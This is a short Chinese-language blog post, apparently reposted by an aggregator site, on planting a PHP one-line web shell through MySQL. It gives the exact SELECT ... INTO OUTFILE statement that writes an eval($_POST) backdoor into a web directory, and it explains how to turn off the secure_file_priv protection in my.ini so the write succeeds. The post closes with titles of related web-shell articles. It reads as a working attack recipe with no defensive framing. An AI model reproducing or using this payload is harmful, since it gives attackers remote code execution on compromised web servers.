通过mysql写入php一句话木马

Posted 逆水行舟,不进则退

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了通过mysql写入php一句话木马相关的知识,希望对你有一定的参考价值。

 利用mysql写入一句话木马

前提:

  root权限,知道了服务器的web的绝对路径

select "<?php @eval($_POST[\'pass\']);?>" INTO OUTFILE "D:\\\\WWW\\\\22.php"

如果执行成功,生成D:\\WWW\\22.php,并写入

<?php @eval($_POST[\'pass\']);?>

如果出现:

  提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法

是mysql设置的权限的问题

mysql对通过文件导入导出作了限制,默认不允许

show variables like \'%secure%\';

修改my.ini

secure_auth = ON
secure_file_priv = ""

注意: 

  1、绝对路径的猜解

  2、INTO OUTFILE 后面的"D:\\\\WWW\\\\22.php"(对反斜杠做了一次转义)

 

以上是关于通过mysql写入php一句话木马的主要内容,如果未能解决你的问题,请参考以下文章

实验:复现PHP一句话木马的利用

一句话木马饶过过滤

PHP一句话木马研究

php eval函数一句话木马代码

以下哪些是常见的php 一句话木马

PHP 一句话木马